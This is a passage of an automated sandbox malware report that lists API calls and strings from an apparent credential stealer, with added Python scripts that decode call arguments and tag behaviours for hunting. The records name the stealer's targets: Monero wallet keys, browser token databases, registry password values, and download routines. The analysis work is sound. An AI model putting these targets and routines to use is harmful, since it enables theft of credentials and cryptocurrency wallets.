                                  • Instruction Fuzzy Hash: DB21FCB1944259ABDB00DFD8CC89FAEB7B8EB44710F104559F605BB280D7B869018BA5
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                  • InternetOpenA.WININET(00BC0DF7,00000001,00000000,00000000,00000000), ref: 00BA610F
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA6147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BA618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BA61B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00BA61DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BA620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00BA6249
                                  • InternetCloseHandle.WININET(?), ref: 00BA6253
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA6260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 9477288ebb62889b9f8f5e200efd27f9033faa54ae4cf92e82ab000bc80995fb
                                  • Instruction ID: 00f80c4d99a7eea96fba1c819cd4e6c90c1f6a309f3f8f358bb2ae05321cc8b6
                                  • Opcode Fuzzy Hash: 9477288ebb62889b9f8f5e200efd27f9033faa54ae4cf92e82ab000bc80995fb
                                  • Instruction Fuzzy Hash: 715143B1900319ABDB20EF64DC85BEE77B8EB45705F1080D8B605BB1C1DBB46A85CFA5
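
The record above lists the WinINet and file-system calls of the download routine with raw numeric arguments (access masks, creation dispositions, INTERNET_FLAG_* values). The following Python is an added example, not part of this Joe Sandbox report: it parses lines in the "APIs" listing format and decodes those arguments into the documented Win32 constant names. SAMPLE_LISTING is copied from the listing on this page; the lookup tables deliberately cover only the APIs and values that occur here, and '?' marks an argument the sandbox could not resolve.

```python
import re

# Added example, not part of the Joe Sandbox report: decode the numeric
# arguments printed in the "APIs" listing into Win32 constant names. The
# constant values are the documented Windows SDK values; SAMPLE_LISTING is
# copied from the listing on this page. '?' marks an argument the sandbox
# could not resolve and is kept as text.

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-F]{8}$")

CREATEFILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CREATEFILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATEFILE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                          4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x2: "FILE_ATTRIBUTE_HIDDEN"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                  0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE"}
REGSAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
LMEM_FLAGS = {0x2: "LMEM_MOVEABLE", 0x40: "LMEM_ZEROINIT"}

# Lines copied from the "APIs" listing on this page.
SAMPLE_LISTING = """\
• Part of subcall function 00BA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BA99EC
• Part of subcall function 00BA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BA9A31
• Part of subcall function 00BA72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA733A
• InternetOpenA.WININET(00BC0DF7,00000001,00000000,00000000,00000000), ref: 00BA610F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BA618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BA61B3
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BA5011
• __aulldiv.LIBCMT ref: 00BB8172
"""


def parse_api_line(line):
    """Split one '• Api.MODULE(args), ref: ADDR' line into a dict, or None.

    Eight-hex-digit arguments become ints; '?' and literal strings such as
    'Password' are kept as text because the report prints both in one list.
    """
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = []
    for tok in (raw.split(",") if raw else []):
        tok = tok.strip()
        args.append(int(tok, 16) if HEX_RE.match(tok) else tok)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": m.group("ref"), "caller": m.group("caller")}


def _flags(table, value):
    """Render a bitmask with the names in `table`; unknown bits stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value
    for bit in table:
        leftover &= ~bit
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


# Per API: argument position -> decoder for that position.
DECODERS = {
    "CreateFileA": {1: lambda v: _flags(CREATEFILE_ACCESS, v),
                    2: lambda v: _flags(CREATEFILE_SHARE, v),
                    4: CREATEFILE_DISPOSITION.get,
                    5: lambda v: _flags(FILE_ATTRS, v)},
    "InternetOpenA": {1: INTERNET_OPEN_TYPE.get},
    "InternetOpenUrlA": {4: lambda v: _flags(INTERNET_FLAGS, v)},
    "RegOpenKeyExA": {0: HKEY_ROOTS.get, 3: REGSAM.get},
    "LocalAlloc": {0: lambda v: _flags(LMEM_FLAGS, v)},
}


def decode_call(call):
    """Return {arg_index: symbolic_name} for each argument we know how to read."""
    out = {}
    for idx, fn in DECODERS.get(call["api"], {}).items():
        if idx < len(call["args"]):
            v = call["args"][idx]
            if isinstance(v, int) and v >= 0:
                sym = fn(v)
                if sym is not None:
                    out[idx] = sym
    return out


def decode_listing(text):
    """Decode every parsable line; returns a list of (api, ref, {idx: symbol})."""
    result = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            result.append((call["api"], call["ref"], decode_call(call)))
    return result


if __name__ == "__main__":
    for api, ref, syms in decode_listing(SAMPLE_LISTING):
        print(f"{ref} {api}: {syms}")
```

Run against the sample, the CreateFileA at 00BA61B3 comes out as GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL (a fresh output file for the InternetReadFile/WriteFile loop), the 0x100 passed to InternetOpenUrlA is INTERNET_FLAG_PRAGMA_NOCACHE, and the RegOpenKeyExA in the password-hunting subcall opens an HKEY_CURRENT_USER key with KEY_READ. Registry access masks are looked up exactly rather than bit-by-bit because KEY_READ and KEY_ALL_ACCESS overlap.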
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA73B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA7452
                                  • HeapFree.KERNEL32(00000000), ref: 00BA7459
                                  • task.LIBCPMTD ref: 00BA7555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 4f1c24f7aad1a0cf5abc659b9f781ce0705e374113e5798f4b82a095a69960dc
                                  • Instruction ID: cf4cf7a486a07d23d58914b15a8e09ad91de331bfe9d9d267f86181126532d1a
                                  • Opcode Fuzzy Hash: 4f1c24f7aad1a0cf5abc659b9f781ce0705e374113e5798f4b82a095a69960dc
                                  • Instruction Fuzzy Hash: 9461F9B5D482589BDB24DB50DC85BD9B7F8BF49300F0081E9E649A6241EF706BC9CFA1
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  • lstrlen.KERNEL32(00000000), ref: 00BABC9F
                                    • Part of subcall function 00BB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BABCCD
                                  • lstrlen.KERNEL32(00000000), ref: 00BABDA5
                                  • lstrlen.KERNEL32(00000000), ref: 00BABDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: d5ba85ad3f2ea3db2c4d94405c5210eaabda84f4f8015f4ff0814f2dbfa75df4
                                  • Instruction ID: 6473d87f78af2398de04f3d251a6c34a34a5ec15d2b88b733889ee49c8241db2
                                  • Opcode Fuzzy Hash: d5ba85ad3f2ea3db2c4d94405c5210eaabda84f4f8015f4ff0814f2dbfa75df4
                                  • Instruction Fuzzy Hash: 23B13E71D10108ABDB14FBA4DC96EFE73B8AF54300F4045A8F506B6592EF746A49CBA2
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 9468cb9c70062c10beab7e74b6f337f3f855300c1340893c46cb3504197e1aa3
                                  • Instruction ID: e65ace1ab6a136f602d940f97a4b0c320afe9a5974db11e41329ff4875c55450
                                  • Opcode Fuzzy Hash: 9468cb9c70062c10beab7e74b6f337f3f855300c1340893c46cb3504197e1aa3
                                  • Instruction Fuzzy Hash: 63F03A3490438AEFD344FFE9A94976C7B70FB04706F050199E609CA390DA746E419BE6
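
Each record's "API ID" and "String ID" lines summarise the function, and across the records above they spell out the stealer's targets: the Monero wallet.keys path read from the monero-core registry key, the token_service query against a Chromium profile database, registry value enumeration for "Password", the locale check (DefaultLangUser) that ends in ExitProcess, and the WinINet fetch and download-to-file routines. The following Python is an added example, not part of this report or of Joe Sandbox: it groups those summary lines into per-function records, tags each record with the behaviour its summary indicates, and pulls the registry keys, paths and SQL out of the String IDs for hunting. The rule table is my own reading of the records on this page; SAMPLE_RECORDS is copied from them.

```python
import re

# Added example, not part of the Joe Sandbox report: tag function records by
# their "API ID" / "String ID" summary lines. RULES is my own reading of the
# records on this page, not a Joe Sandbox signature; SAMPLE_RECORDS is copied
# from those records (a record closes on its "Instruction Fuzzy Hash" line).

SAMPLE_RECORDS = r"""
• API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
• String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
• Instruction Fuzzy Hash: 9E5146B1D501196BCB15FB60DDA2FFD73BC9F54300F4045D8B60AA6092EE706B89CBA6
• API ID: Heap$EnumFreeOpenProcessValuetask
• String ID: Password
• Instruction Fuzzy Hash: 9461F9B5D482589BDB24DB50DC85BD9B7F8BF49300F0081E9E649A6241EF706BC9CFA1
• API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
• String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
• Instruction Fuzzy Hash: 23B13E71D10108ABDB14FBA4DC96EFE73B8AF54300F4045A8F506B6592EF746A49CBA2
• API ID: ExitProcess$DefaultLangUser
• String ID: *
• Instruction Fuzzy Hash: 63F03A3490438AEFD344FFE9A94976C7B70FB04706F050199E609CA390DA746E419BE6
• API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
• String ID:
• Instruction Fuzzy Hash: 715143B1900319ABDB20EF64DC85BEE77B8EB45705F1080D8B605BB1C1DBB46A85CFA5
• API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
• String ID:
• Instruction Fuzzy Hash: 6931F6B4A00218ABDB20DF54DC85BDDB7B4EB48704F5081D9FB09A7281D7B06EC58FA9
"""

FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*?)\s*$")


def parse_records(text):
    """Group summary lines into one dict per function, keyed by fuzzy hash."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        field, value = m.groups()
        if field == "API ID":
            cur["api"] = value
        elif field == "String ID":
            # The report joins a function's strings with '$'.
            cur["strings"] = [s for s in value.split("$") if s]
        else:
            cur["hash"] = value
            cur.setdefault("api", "")
            cur.setdefault("strings", [])
            records.append(cur)
            cur = {}
    return records


def _has(api_id, *parts):
    """The API ID is a concatenation of API name fragments, so match substrings."""
    return all(p in api_id for p in parts)


# Behaviour rules: name -> predicate over (API ID, list of strings).
RULES = {
    "monero_wallet_keys_collection": lambda api, strs:
        any(s.endswith("wallet.keys") for s in strs) and _has(api, "Copy", "Read", "Delete"),
    "chromium_token_service_query": lambda api, strs:
        any("FROM token_service" in s for s in strs),
    "registry_password_value_hunt": lambda api, strs:
        "Password" in strs and _has(api, "Enum", "Value"),
    "locale_gated_exit": lambda api, strs: _has(api, "ExitProcess", "DefaultLang"),
    "wininet_fetch": lambda api, strs: _has(api, "Internet", "Read"),
    "wininet_download_to_file": lambda api, strs:
        _has(api, "Internet", "Read", "Create", "Write"),
}


def tag_records(records):
    """Return {fuzzy_hash: [tags]} for every record matching at least one rule."""
    tagged = {}
    for r in records:
        tags = [name for name, rule in RULES.items() if rule(r["api"], r["strings"])]
        if tags:
            tagged[r["hash"]] = tags
    return tagged


def collect_artifacts(records):
    """Pull registry keys, file paths and SQL out of the String IDs for hunting."""
    out = {"registry": [], "paths": [], "sql": []}
    for r in records:
        for s in r["strings"]:
            if s.upper().startswith("SOFTWARE\\"):
                out["registry"].append(s)
            elif s.startswith("\\") and "." in s:
                out["paths"].append(s)
            elif s.upper().startswith("SELECT "):
                out["sql"].append(s)
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for h, tags in tag_records(recs).items():
        print(h[:16], ", ".join(tags))
    print(collect_artifacts(recs))
```

The registry-password rule fires on the subcall record (String ID "Password"), not on its caller, whose own String ID is only the ":" separator it uses to format output; that is why the rule combines the string with the Enum/Value API fragments instead of matching on strings alone. The fuzzy hash is used as the record key because the summary lines carry no function address.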
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BA4FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA4FD1
                                  • InternetOpenA.WININET(00BC0DDF,00000000,00000000,00000000,00000000), ref: 00BA4FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BA5011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BA5041
                                  • InternetCloseHandle.WININET(?), ref: 00BA50B9
                                  • InternetCloseHandle.WININET(?), ref: 00BA50C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: eb9e86324f281fe6d6291858b72a2c8d921b3830bd6207512c2e87c592ec403b
                                  • Instruction ID: dc917aa1e6c2cbc8304b4b0cedd0bd493af1bf827809bbdcb0269c82beeab7c2
                                  • Opcode Fuzzy Hash: eb9e86324f281fe6d6291858b72a2c8d921b3830bd6207512c2e87c592ec403b
                                  • Instruction Fuzzy Hash: 6931F6B4A00218ABDB20DF54DC85BDDB7B4EB48704F5081D9FB09A7281D7B06EC58FA9
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB8426
                                  • wsprintfA.USER32 ref: 00BB8459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8499
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,014108F8,00000000,000F003F,?,00000400), ref: 00BB84EC
                                  • lstrlen.KERNEL32(?), ref: 00BB8501
                                  • RegQueryValueExA.ADVAPI32(00000000,01410760,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BC0B34), ref: 00BB8599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 52347f296c281ac9ac06ca90cc39464bd158589c6e0aab80931b6750929eeeed
                                  • Instruction ID: d2eb4642c129e481aa380a9ac5821b58d61514feec205eae60aba7ab3eea9bc8
                                  • Opcode Fuzzy Hash: 52347f296c281ac9ac06ca90cc39464bd158589c6e0aab80931b6750929eeeed
                                  • Instruction Fuzzy Hash: F721B771910218ABDB24EB54DC85FE9B7B9FB48704F00C5D9A609A6240DFB1AA85CFE4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB76A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB76AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,013FB728,00000000,00020119,00000000), ref: 00BB76DD
                                  • RegQueryValueExA.ADVAPI32(00000000,014106D0,00000000,00000000,?,000000FF), ref: 00BB76FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB7708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: a789d7bc7bd2bca568908c6ec11fcc413ce5438411578089dd6fc0304428f388
                                  • Instruction ID: 3eb545eeefaefe62d2bd6abcaefb3abf178f867a2c8ff096608772ff9c8fc8e1
                                  • Opcode Fuzzy Hash: a789d7bc7bd2bca568908c6ec11fcc413ce5438411578089dd6fc0304428f388
                                  • Instruction Fuzzy Hash: 38014FB5A44309BBD700EBE9DC89FB9B7B8EB48701F104095FA05DB290DAB0A9048B61
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,013FB728,00000000,00020119,00BB76B9), ref: 00BB775B
                                  • RegQueryValueExA.ADVAPI32(00BB76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BB777A
                                  • RegCloseKey.ADVAPI32(00BB76B9), ref: 00BB7784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 04a13a58311972b851fea1e901e4d7d6c5f36508ed38e05744dd186bfdf33749
                                  • Instruction ID: 27d309435d6876eafe9905cc1ee98534955ca1cc0c44cd32011275258843d120
